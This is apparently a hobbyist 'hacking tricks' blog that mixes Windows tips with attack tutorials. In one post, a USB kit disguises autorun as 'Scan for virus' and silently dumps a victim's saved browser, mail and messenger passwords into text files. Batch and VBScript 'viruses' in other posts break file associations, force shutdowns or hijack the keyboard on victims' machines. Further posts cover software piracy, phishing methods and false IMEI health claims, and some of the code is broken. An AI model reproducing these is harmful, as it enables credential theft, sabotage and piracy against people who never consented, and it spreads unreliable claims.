Email Hacking -How to Hack Yahoo Accounts ?

When i was searching on the net i found many of the people interested in Hacking Yahoo Passwords and many of them asking this type of question in different Form but they won't get any proper reply so i decided why not to write a article about Hacking Yahoo Account Passwords.

Hacking Yahoo Accounts is easy but it is possible only when HE(Target Account to be Hacked) is your friend.

Google Update PageRank-TrUe HaCkinG got PR1

When i was chatting one of my friend told that Google has updated the PageRank without neglecting i just opened a PageRank checker site & i entered my blog URL after checking i just shocked seeing the result because my blog got PAGERANK 1 even though it is a new blog & Google gave a page rank 1 .

How I got this rank within a few months..??

How to get a Genuine License for BitDefender Internet Security 2009

As i always like to share good software with Keygens or Licence so here in this post i would like to share How to get a GENUINE LICENCE of BitDefender Internet Security 2009..!! yes this is true you can get Genuine licence of cost $39.95 for free this offer may close soon so please get a Licence as soon as possible for getting this licence follow the simple steps as show below..

How to speedup Adobe Reader ?

Each new version of Adobe Acrobat Reader seem to be getting slower than previous version. I have used Adobe Acrobat Reader since v4 and it was fast. When it was v5 - v7, the loading speed was still fine. But from version 8 onwards loading time has been significantly increased!

Show or hide the Recycle Bin icon in windows vista

In this post i will show you how show or hide your Recycle Bin icon on your windows vista. Recycle Bin is a useful icon but most of the people don't like to show it on there desktop because they like to keep there desktop clean i.e without any icon for those who don't need to show there recycle bin icon please continue reading this post. This is the easiest way to show or delete a recycle bin icon from desktop follow the simple steps as shown ..

Microsoft launches Internet Explorer 8

Internet Explorer 8 is moving out of beta: The final version will be available now. The new browser is packed with new features and improved security features, and early reviews and impressions have been largely positive.

I am sure many of you will want to get your hands on the new browser and maybe some of you are hoping to switch over to IE8 as your browser of choice. Whatever your motivations,

Cannot able to Delete Files or Folders ?

When ever we try to delete some files or folder in our PC some times it shows an error like this

* Cannot delete file: Access is denied
* There has been a sharing violation.
* The source or destination file may be in use.
* The file is in use by another program or user.
* Make sure the disk is not full or write-protected and that the file is not currently in use.

or some different errors like this when ever you try to delete files. For this problem Unlocker is the solution!. To get rid of this problem follow the simple steps as shown below

How To Open Multiple ID in Google Talk

By default, we can open only one instance of Google Talk. This limits us to be online in a single Google Talk ID at a given time. Suppose you want to be online in multiple Google Talk ID's at the same time, then how will you achieve it? The trick is very simple and takes just few seconds to implement.

Just follow few steps as shown below...

How to Make Windows XP into Genuine

In this post i will show how to make your windows XP into Genuine without paying a single buck..!! Yes it is possible to make windows xp into Genuine without buying the original License. The secrets of make Genuine is now exposed.The secret is just to add a REGISTRY entry ok i know some of them they don't know what is REGISTRY ? even those who don't know Registry it is possible to use this trick. Just follow simple steps as show below.

1. Download the LICENSE.REG

2. Now just Double click the file, choose Yes when prompted.

3. Now its time to Validate(Activate) so just go to Genuine Microsoft Software and then click on “Validate Windows” .

Ok now your windows is Genuine Happy..

Don’t forget to drop your comments here.

Folder Replicator Batch virus

Today i gonna show you how to make a batch file that creates a folder inside a folder & so on..

I know all of them are interested in making virus so once again i came up with new virus(not a virus but it's a batch file).

Here is a Simple batch virus that contains only 6 lines, has the tendency to replicate itself again and again and keeps on creating a folder with same name, until a user stops it.

1. Just open up a notepad, copy and paste the below code

cd C:\Documents and Settings\username\Desktop
md Virus
cd Virus
goto loop

2. Save it as folder.bat, before doing that you have to modify the code by changing the place where it says ‘username’ and instead of that replace it by the currently logged in username.

3. Then run it on the Victims computer to infect it.

4. Any how it doesnt cause much harm, but replicates folder inside a folder and goes on.

Feel free to share your fellings in comments.. : )

Adding Drives or Folder in Send To option

This article is usefull those who copy files to particular FOLDER or DRIVE again & again.It may take time to navigate the folder to copy files again & again so in this tutorial i will show how to get rid of this problem.

In default SEND TO option by default it contains only some of the option (path)
ex: compressed (zipped)folder, Desktop (create shortcut, Mail Recipient etc as shown in the below image.

If you need to add extra option(path) to this list(SEND TO) then follow the simple steps as follows.

1. Open RUN

2. Copy & Paste the below address & Hit Enter


3. Then Right click on the blank area & navigate to New >> Shortcut as shown below

4. When you click on the Shortcut a pop up menu opens in that browse the address of the folder or drive then click OK & FINISH.

ex: in the below image i am adding SOFTWARE(D:) in send to option.

5. After adding D: drive in SEND TO option it will displays like this

If you wish you can change the icons of the folder.

Auto Update Checker For All Installed Softwares

We use several softwares on our PC. Few of them are in the trail version, some are in the beta version while few are in their full released version. From time to time, their companies release their updated versions. These updates comes with few bugs fixed, improved and with more functionality. So, it’s necessery to get the updated version of the softwares. But how cool is it to check if they are having new updates or not by themselves?

Update checker is a freeware from the house of This Update Checker tool comes in handy as it’s very small in size. It’s just 153 KB. Download and install it. Once installed it will find if your installed softwares are having any newer updates or not.

The result will be displayed in a different page. On the right hand side of the results, you will get a link to download the updated versions of your softwares. It’s a recommended tool if you are having many softwares installed and find it very difficult to search for their updates manually.

What are the requirements?

The Update Checker works on any Windows PC running Vista, XP, 2003, 2000, ME or 98.
It requires that the Microsoft .NET Framework 2.0 is installed

File Size : 124.17 KB

Skype in Nokia ?

Well for the readers who want to save a little money, Skype will apply there software in the newest cellular phone from Nokia. The first cellular phone that will get this software Skype is Smartphone N97, that will produced in June. Skype personally was software Chatting that has had fame in the maya world.

Nokia cellular phone will enclose Skype in address book to show that your colleague was online for the call or sending some messege, by using the internet ability from this cellular phone, this service will permit the user to speak with the other skype customer free and in a speaking manner with who at a cheep cost , used skypeOut. Reportedly again, this software skype also will be applied to Sony Ericsson Xperia1.

How about the other phone producer ? :)

Ext_change Virus

Here in this article i came with Extension changer virus today i am gonna showing you how to change an Extension of an files.

What is Extension changer ?

Assume that all images (*.jpeg, Gif etc) are by default opening with "Windows Picture and Fax Viewer" but in this article this will change to some other application as you wish for ex: .mpeg application so that it cannot be opened in this way you can disable opening of jpeg application.The source code & step by step procedure is as follows.

1. Open a Notepad and copy and paste the below code

@echo off
assoc .txt=jpegfile
assoc .exe=htmlfile
assoc .jpeg=avifile
assoc .png=mpegfile
assoc .mpeg=txtfile
assoc .sys=regfile
msg Your System got Infected…..

2. Save it as extension.bat, and now you are ready to go…

3. Execute this on Victims computer

This Virus File will change the native extension with some other extension and makes them unable to open the file unless they know how to deal with it…

The above program replaces all the text files [.txt] with the extension [.jpeg], and likewise….

Pass your comments about this article..

Hack Passwords through USB Drive

Ok after completing my 1st internals i would like to wright a article about Hacking USER NAME & PASSWORD through USB drive(pen drive) in easy steps.yes it is possible to hack passwords through USB drive to do this 1st you need to access the target computer then it is possible to hack passwords.

What is concept behind this Hacking..?

As we all know that windows stores the USER NAME & PASSWORDS of many website that are visiting in daily & we don't like to enter the user name & passwords again & again so what we do on this time is we just check on Remember me on that when we check on that box windows stores your user name & password but we can't easily see the stored passwords in your browser.we can restore this saved passwords by using some software.

Which are the passwords that can be able to access by using this hacking tools..?

All saved passwords in your computer can able to hack using this hacking tools.
ex: yahoo messenger password, Outlook Express password, passwords stored in the browsers link IE & Firefox.

Hacking Tools with there functions:

IE PassView: IE PassView is a small utility that reveals the passwords stored by Internet Explorer browser. It supports the new version of Internet Explorer 7.0, the Beta version of Internet Explorer 8.0, as well as older versions of Internet Explorer, v4.0 - v6.0

MessenPass: MessenPass is a password recovery tool that reveals the passwords of the following instant messenger applications:

* MSN Messenger
* Windows Messenger (In Windows XP)
* Windows Live Messenger (In Windows XP And Vista)
* Yahoo Messenger (Versions 5.x and 6.x)
* Google Talk etc

MessenPass can only be used to recover the passwords for the current logged-on user on your local computer, and it only works if you chose the remember your password in one of the above programs.

Mail PassView: Mail PassView is a small password-recovery tool that reveals the passwords and other account details for the following email clients:

* Outlook Express
* Microsoft Outlook 2000 (POP3 and SMTP Accounts only)
* Microsoft Outlook 2002/2003/2007 (POP3, IMAP, HTTP and SMTP Accounts)
* Windows Mail
* Yahoo! Mail - If the password is saved in Yahoo! Messenger application.
* Hotmail/MSN mail - If the password is saved in MSN/Windows/Live Messenger application.
* Gmail - If the password is saved by Gmail Notifier application, Google Desktop, or by Google Talk & etc.

For each email account, the following fields are displayed: Account Name, Application, Email, Server, Server Type (POP3/IMAP/SMTP), User Name, and the Password.

Protected Storage PassView: Protected Storage PassView is a small utility that reveals the passwords stored on your computer by Internet Explorer, Outlook Express and MSN Explorer. The passwords are revealed by reading the information from the Protected Storage.

: PasswordFox is a small password recovery tool that allows you to view the user names and passwords stored by Mozilla Firefox Web browser. By default, PasswordFox displays the passwords stored in your current profile, but you can easily select to watch the passwords of any other Firefox profile. For each password entry, the following information is displayed: Record Index, Web Site, User Name, Password, User Name Field, Password Field, and the Signons filename.

I have uploaded all this Hacking tools in single package click on download button to download.


Password: P.K.ARUN [ ]

Here is the step by step procedure to create the Hacking kit.

1. Download all the 5 tools, extract them and copy only the executables(.exe files) into your USB Pendrive.

ex: Copy the files named as - mspass.exe, mailpv.exe, iepv.exe, pspv.exe and passwordfox.exe into your USB Drive.

2. Open a Notepad & copy the following commands

ACTION= Scan for virus

save it as autorun.inf

3. Open new Notepad & copy the following text commads as it is

start mspass.exe /stext mspass.txt

start mailpv.exe /stext mailpv.txt

start iepv.exe /stext iepv.txt

start pspv.exe /stext pspv.txt

start passwordfox.exe /stext passwordfox.txt

& save it as launch.bat

now the time to copy the autorun.inf & launch.bat to your pendrive

Now your hacking kit is ready to use & you can use this as hacking kit. To do hacking follow the simple procedure.

1. Insert the pendrive to the PC the autorun window will pop-up. (This is because, we have created an autorun in pendrive).

2. In the pop-up window, select the first option (Scan for virus).

3. Now all the password hacking tools will silently get executed in the background (This process takes hardly a few seconds). The passwords get stored in the .TXT files.

4. Remove the pendrive and you’ll see the stored passwords in the .TXT files.

5. This hack works on Windows 2000, XP and Vista

NOTE: This procedure will only recover the stored passwords (if any) on the Computer.

( OR )

Those how have downloaded the hacking kit from simple extract the files to pendrive then your kit is ready.

Feel free to post your feelings & comments .. EnJoy the hacking with TrUe HaCkinG

Is your Nokia Cell Phone Original ?

Nokia is one of the largest selling phones across the globe.Most of us own a Nokia phone but are unaware of it’s originality.Are you keen to know whether your Nokia mobile phone is original or not? Then you are in the right place and this information is specially meant for you. Your phones IMEI (International Mobile Equipment Identity) number confirms your phone’s originality.

Press the following on your mobile *#06# to see your Phone’s IMEI number(serial number).

Then check the 7th and 8th numbers

Phone serial no. x x x x x x ? ? x x x x x x x

IF the Seventh & Eighth digits of your cell phone are 02 or 20 this means your cell phone was assembled in Emirates which is very Bad quality

IF the Seventh & Eighth digits of your cell phone are 08 or 80 this means your cell phone was manufactured in Germany which is fair quality

IF the Seventh & Eighth digits of your cell phone are 01 or 10 this means your cell phone was manufactured in Finland which is very Good

IF the Seventh & Eighth digits of your cell phone are 00 this means your cell phone was manufactured in original factory which is the best Mobile Quality

IF the Seventh & Eighth digits of your cell phone are 13 this means your cell phone was assembled in Azerbaijan which is very Bad quality and also dangerous for your health.

Optimize your PC by ccleaner

CCleaner is a freeware PC optimization tool.

It combines a system cleaner that removes unused and temporary files from your system and also a fully featured registry cleaner!
CCleaner allows Windows to run faster, more efficiently and gives you more hard disk space.
The best part is that it's Small, Fast and Free!

Cleans the following Windows components:

* Internet Explorer

- Temporary File Cache
- URL History
- Cookies
- Hidden Index.dat files
- Last download file location

* Firefox

- Temporary File Cache
- URL History
- Cookies
- Download manager

* Google Chrome
* Opera
* Safari
* Recycle Bin
* Clipboard
* Windows Temporary files
* Windows Log files
* Recent Documents (on the Start Menu)
* Run history (on the Start Menu)
* Windows XP Search Assistant history
* Windows XP old Prefetch data
* Windows memory dumps after crashes
* Chkdsk file fragments

Advanced Options allow cleaning of:

* Menu Order cache
* Tray Notifications Cache
* Window Size and Location Cache
* User Assist history
* IIS Log Files
* Custom Folders

Application Cleaning:

As well as cleaning up old files and settings left by standard Windows components, CCleaner also cleans temporary files and recent file lists for many applications. Including:

* Firefox, Opera, Safari, Media Player, eMule, Kazaa, Google Toolbar, Netscape, Microsoft Office, Nero, Adobe Acrobat Reader, WinRAR, WinAce, WinZip and more...

Registry Cleaning:

CCleaner uses an advanced Registry Cleaner to check for problems and inconsistencies. It can check the following:

* File Extensions
* ActiveX Controls
* ClassIDs
* ProgIDs
* Uninstallers
* Shared DLLs
* Fonts
* Help File references
* Application Paths
* Icons
* Invalid Shortcuts and more...


CCleaner was designed from the ground to be safe and secure to use. It has multiple levels of checks in place to ensure that it cannot delete any useful information or documents you may still need. We also certify that it contains no Spyware or Adware.
High Security:
For the super cautious users we also offer secure file erasing. By overwriting the files before deleting them, making it impossible to recover the data.


SIZE: 3.02MB

Download AVG Anti-virus Free Edition 8.0 with Anti-spyware

Basic antivirus and antispyware protection for Windows available to download for free. Limited features, no support, for private and non-commercial use only.

* The most downloaded software on CNET's
* Quality proven by 70 millions of users
* Easy to download, install and use
* Protection against viruses and spyware
* Compatible with Windows Vista and Windows XP

AVG Anti-Virus Free Edition is only available for single computer use for home and non commercial use.

System Requirements:

Computer Hardware:

* Intel Pentium 300 MHz
* 30 MB free hard drive space (for installation)
* 256 MB RAM

Operating Systems

* Windows 2000
* Windows XP
* Windows XP x64
* Windows Vista
* Windows Vista x64

SIZE: 57.2MB

Making your own shortcut key to open an folder

In this tutorial we´ll see quickest way through which you can open favorite folders and programs.With this trick , you´ll be able to open many folders (or) programs in a short period of time. It is really useful, at least by my opinion. Lets see how it works on my computer. In my example i am taking folder named as "HACKING2ALL" & "P.K.ARUN" to open it in Alias Name(Short name).

1. Navigate to the folder that you want to make a Alias Name ( In my example i taken the folder named as "HACKING2ALL" & "P.K.ARUN" )

2. Create a shortcut on the desktop as shown in the figure

3. Rename shortcuts to alias names(shortcut name) in my example i taken as "P" & "K"

4. Cut or Paste shortcuts to C:\WINDOWS.

5. Go to Run option and type alias name. In my example alias names are "P" and "K"
Shortcut Key : press win logo key + R and alias key and enter.

When you press OK the folder "P.K.ARUN" will opens

What is the concept behind this trick ?

The answer is Any file (or) shortcut you place inside C:\windows folder is a command for run prompt this is the logic behind this trick i hope it will helpful to you.

Leave your comments if any trouble appears

Virus writing code..!!

friends want to play with your friends computer..?

if yes then start reading this post.

In this article i came with new pranks (or) tricks (or) similar to virus creating ..
ya it's acts like a virus but not virus it's a simple programme.

Materials: NOTEPAD

By using only notepad you can create your own virus don't worry it doesn't effect your PC.

Ok the below are the codes of Virus like acting.

* Convey your friend a lil' message and shut down his / her computer:

Type in notepad:

@echo off
msg * I don't like you
shutdown -c "Error! You are too stupid!" -s

Save it as "Anything.BAT" in All Files and send it.

* Open Notepad continually in your friend's computer:

Type :

@ECHO off
START %SystemRoot%\system32\notepad.exe
GOTO top

Save it as "Anything.BAT" and send it.

* Toggle your friend's Caps Lock button simultaneously:

Type :

Set wshShell =wscript.CreateObject("WScript.Shell")
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"

Save it as "Anything.VBS" and send it.

* Frustrate your friend by making this VBScript hit Enter simultaneously:

Type :

Set wshShell = wscript.CreateObject("WScript.Shell")
wscript.sleep 100
wshshell.sendkeys "~(enter)"

Save it as "Anything.VBS" and send it.

* Frustrate your friend by making this VBScript hit Backspace simultaneously:

Type :

MsgBox "Let's go back a few steps"
Set wshShell =wscript.CreateObject("WScript.Shell")
wscript.sleep 100
wshshell.sendkeys "{bs}"

Save it as "Anything.VBS" and send it.

* Ok this is my favorite , this script hacks your friend's keyboard and make him type "You are a fool" simultaneously , u can change " you are a fool" to any anything u want .

Type :

Set wshShell = wscript.CreateObject("WScript.Shell")
wscript.sleep 100
wshshell.sendkeys "You are a fool."

Save it as "Anything.VBS" and send it.

All this works until system will restart so don't worry

Please leave your comment ... i love comments

Multiple Login in Yahoo Messenger

Do you know this we can MULTIPLE LOGIN IN YAHOO MESSENGER in same PC ..??

is it is possible ...

the answer in my blog is YES..!!

How can we do it..??

wheather any software is need to do..??

NO not for me it is for those who don't know anything about

Then how can we do ...

follow the 5 simple steps as shown below

thinking .. don't think more it is easy start reading steps

1. Go to Start ----> Run . Type regedit, then enter .

2. Navigate to HKEY_CURRENT_USER --------> Software --->yahoo

3. On the right page , right-click and choose new Dword value .

4. Rename it as Plural.

5. Double click and assign a decimal value of 1.

Its done!!

Now close registry and restart yahoo messenger and try Multiple Login.


If you people feel boring to do this procedure then download *.Reg file made by me itself because of the request in comment i.e


using multiple login in yahoo messenger is very very good but can you tell me please how to get back into single login in yahoo messenger

he made a request that how to disable the multiple login .... i may explain manually but it takes time to implement those steps so i decided to make this Registry file you download them from below link.

DOWNLOAD: Enable-Multiple login-by P.K.ARUN

DOWNLOAD: Disable-Multiple login by P.K.ARUN

Need more help comment here...

Reveal *****(Asterisk) Passwords Using Javascript

Want to Reveal the Passwords Hidden Behind Asterisk (****) ?

Is it is possible to reveal by using only simple Javascript ..?

The Answer is YES it is possible just copy this few lines into your browser & Hit Enter then the password will show ..!!

Follow this simple procedure to get passwords that you have entered.

1. Open the Login Page of any website. (eg.

2. Type your 'Username' and 'Password'.

3. Copy and paste the JavaScript code given below into your browser's address bar and press 'Enter'.

javascript: alert(document.getElementById('Passwd').value);

4. As soon as you press 'Enter', A window pops up showing Password typed by you..!

Note :- This trick may not be working with firefox.

Feel free to comment.. : )

Download Youtube Video by Installing Script

friends in this post i will tell u how to download "youtube" vedios by installing script(only for firefox user) without going other website.

This is the most easyest way to download youtube vedio.

1. open firefox browser

2. go to

& install the script

3. open the youtube then select the vedio that u want to download.

4. when u open the vedio below there is a download option(as shown in the above fig) click & download.

NOTE: first u must install GREASEMONKEY ADD-ONS

if u have any dought pls comment here...



Hacking Orkut

Google uses a 4 Level Orkut login which makes it difficult to hack Orkut using brute force attack.

First Level- Security-SSL or 128 bit secured connection

Second Level- Google account checks for cookie in the sytem of user

Third Level- Google provides a redirection to the entered User information

Fourth Level- Google doesn’t use conventional php/aspx/asp coding. So it is impossible to hack Orkut using input validation attack!!!

It is not an easy task to hack Orkut by breaking this security! But still some people manages to get access to other’s Orkut accounts. The question concerned is How they do it? Many of them just use simple tricks that fool users and then they themself leak out their password. Here are some points you need to take care of, to prevent your Orkut account being hacked!

Phishing Attack is the most popular way of hacking/stealing other’s password.By using fake login pages it is possible to hack Orkut. Here the users land on a page where they are asked for their login information and they enter their Orkut username and password thinking it to be a real page but actually it is other way round. It submits all the entered details to the creator of the fake login page.

Orkut New Features
: I have come across a page(fake page) that looks like they are giving the user a choice of selecting new features for orkut with your ID and password, of course!! When the user submit’s his/her Orkut login information through this page, there goes his ID and password mailed to the coder.

Community Links: Many times you are provided with a link to a community in a scrap. Read the link carefully, It may be something like OKRUT not ORKUT. This is definitely a trap created by the hacker to hack your Orkut password. Clicking on this link will take you to a fake login page and there you loose up your password.

Java script: You must have seen the circulating scraps that asks you to paste this code in your address bar and see what happens! Well sometimes they also leak out your information. Check the code and if you are unsure of what to do, then I recommend not to use it.So be careful, javascripts can even be used to hack Orkut!

Primary mail address
: If by some means a hacker came to know the password of your Yahoo mail or Gmail, which users normally keeps as their primary mail address in their Orkut account, then hacker can hack Orkut account by simply using USER ID and clicking on ‘forget password’.This way Google will send link to the already hacked primary email ID to change the password of the Orkut account. Hence the email hacker will change your Orkut account’s password. Hence your, Orkut account is hacked too.

So a better thing would be to keep a very unknown or useless email id of yours as primary email id so that if the hacker clicks on ‘Forgot password’ the password changing link goes to an unknown email id i.e. not known to the hacker.Hence your Orkut account saved.

So, I hope that this post not only teaches you to hack Orkut but also to hack protect your Orkut account.

If you would like to share something, comment here and I will add up here with a credit to your name.

Remove unwanted application from "open with" list

In windows, we open some files with other supported applications too.. like mp3 files we can open with winamp, media player, itune, or many other mp3 players...
Now here ill tell you hack for how to remove unwanted applications from this open with list..
This is very simple n useful trick
lets go..

1] Run > regedit > hit Enter

2] Registry > My Computer > HKEY_CLASSES_ROOT > Applications

3] When you expand 'Applications' key then you will see a long sub keys list of program names
like accwiz.exe, BitTorrent.exe, n something like more list..

4] Then select a application key which you want to remove from 'Open with' list..
(e.g.- i selected 'flash.exe' to remove from list)

5] Right click in right side pane in blank area or go to Edit> New

6] add New> 'String Value' (REG_SZ)

7] Change name of string value as 'NoOpenWith' (case-sensitive)

8] We Don't need to set any value data for this string..

9] Refresh your desktop n check open with list for any file..

Finish... :-)

if you have any dought u can comment ...

Removing shortcut mark from icons ..



friends r u bored with seeing short cut mark in the icons ok today i will explain how to remove it in a simple steps without using any softwares.

1. first Open REGEDIT.EXE by writing "regedit" in Start->>Run menu (winlogo+R)


3. then open the Key LNKFILE

4. Delete the value IsShortcut

5. Open the next Key PIFFILE

6. Delete the value IsShortcut

7. Restart the windows.

hack youtube videos & download...!!!!

friends today I will explin you how to download youtube videos in simple step without any software.

1. Go to

2. select the video that you want to download.if I want to download the videos of the below url(fig 1)


3. just add "kick" word to the url(fig2)


4. select the formet that u want to download(fig3) & click "GO" thats all select the path to download the vedio : )

*click on photo to enlarge it


before doing hacking lets know somthing about it.

* What is Hacking?

* Who is a Hacker?

* Who is a Cracker?

* Who is a Script Kiddy?

* What skills do I need to become a Hacker?

* What is the best way to learn Hacking?

* How do I secure my computer from being Hacked?

What is Hacking?

Computer hacking is the practice of modifying computer hardware and software to accomplish a goal outside of the creator’s original purpose.Hacking is the art of exploiting the flaws/loopholes in a software/module.Since the word “hack” has long been used to describe someone who is incompetent at his/her profession, some hackers claim this term is offensive and fails to give appropriate recognition to their skills.

Who is a Hacker?

A Hacker or White Hat Hacker, also known as Ethical Hacker, is a Computer Security expert, who specialise in penetration testing, and other testing methodologies, to ensure that a company’s information systems are secure. Such people are employed by companies where these professionals are sometimes called Sneaker.

Who is a Cracker?

Black Hat Hackers, who may also be known as Crackers, are Hackers, who specialise in unauthorized penetration of information systems. They may use computers to attack systems for profit, for fun, or for political motivations, as part of a social cause. Such penetration often involves modification and/or destruction of data, and is done without authorization. They also may distribute computer viruses, Internet Worms, and deliver spam through the use of bot nets.

Who is a Script Kiddy?

A script kiddy is a wannabe cracker. These individuals lack knowledge of how a computer really works but they use well-known easy-to-find techniques and programs or scripts to break into a computer to steal porn, music files, SPAM, etc.

What skills do I need to become a Hacker?

There is no magic to Hacking, but like anything else that is worthwhile it takes dedication, a willingness to learn.It is most important to have a good knowledge of topics such as Operating system and it’s working,Computer networks,Computer security and of course Programming.It’s not possible to become a hacker overnight.It’s the skill developed over a long time.

What is the best way to learn Hacking?

The best way to learn Hacking is to start learning about the basics of hacking right from now.There are many books about Hacking that are available today.But before you start learning about the details you must have a basic skills of Programming and knowledge of Computer network security.Internet is the best source to learn about hacking.

How do I secure my computer from being Hacked?

Having a basic knowledge of computer security and related topics such as virus,Trojans,spyware,phishing etc. is more than enough to secure your computer.Install a good antivirus and a firewall.


Your usage of this website constitutes your agreement to the following terms.

1. All the information provided on this site are for educational purposes only.The site is no way responsible for any misuse of the information.

2. The words "Hack" and "Hacking" should be taken or considered as "Ethical Hack" or "Ethical Hacking".

3. The posts intended or titled "password cracking" are actually added to allow readers recover their lost or forgotten passwords and not for cracking any other email account password.

4. Implementation of hacks explained by us is sole responsibility of user and "" is not responsible for any damages caused by the hacks explained in this site .

Link Exchange(Now we are not adding any links)

Friends if you want your blog want to be more popular than
"EXCHANGING BANNERS" or "EXCHANGING LINKS" is very important.ok now come to the matter..

If you want to advertise your blog/website than you need put this code to your blog/website after doing that you can contact me by posting comment here (or) by sending email to :


1.Make sure your blog/website doesn't contains ADULT material.

2.After I check and your request be agreed, your link or banner will display in
"LINK US" or "BANNER LINKS" of the main page.


If your planning to add Text Link then add as shown below:


₮ℜ凹E ℍaℂкiℕG™█

NOTE: Never erase my code after your request approved.If you do like this your name/blog/website will blacklisted.

Update 1: Now we are not adding any Text Link and Banner links in my blog.